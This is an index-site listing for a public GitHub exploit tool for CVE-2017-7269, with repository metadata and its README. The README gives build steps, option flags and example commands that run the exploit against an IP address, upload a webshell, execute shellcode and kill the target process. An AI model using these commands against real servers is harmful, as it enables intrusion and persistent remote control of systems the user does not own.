Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/zcgonvh/cve-2017-7269-tool
CVE-2017-7269 to webshell or shellcode loader
https://github.com/zcgonvh/cve-2017-7269-tool
Last synced: 25 days ago
JSON representation
CVE-2017-7269 to webshell or shellcode loader
- Host: GitHub
- URL: https://github.com/zcgonvh/cve-2017-7269-tool
- Owner: zcgonvh
- Created: 2017-05-16T18:47:45.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2017-05-16T18:48:15.000Z (over 7 years ago)
- Last Synced: 2024-08-03T18:11:51.248Z (4 months ago)
- Language: C#
- Size: 42 KB
- Stars: 87
- Watchers: 2
- Forks: 32
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-webshell - **76**星 - 2017-7269 to webshell or shellcode loader (<a id="faa91844951d2c29b7b571c6e8a3eb54"></a>新添加)
- awesome-hacking-lists - zcgonvh/cve-2017-7269-tool - CVE-2017-7269 to webshell or shellcode loader (C# #)
README
# cve-2017-7269 webshell and shellcode tool
### build
csc cve-2017-7269.cs
### usage
CVE-2017-7269 [parms]
Header:
-h set host for [If] header
-p set port for [If] header
-s set scheme for [If] header
-l length of physical path
WebShell:
-w upload webshell to server
-wp path of webshell to save
ShellCode:
-c execute the shellcode
Misc:
-t test vulnerable only.
-e exit process when getshell or test
-k kill target(equals -e and -t)### example
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin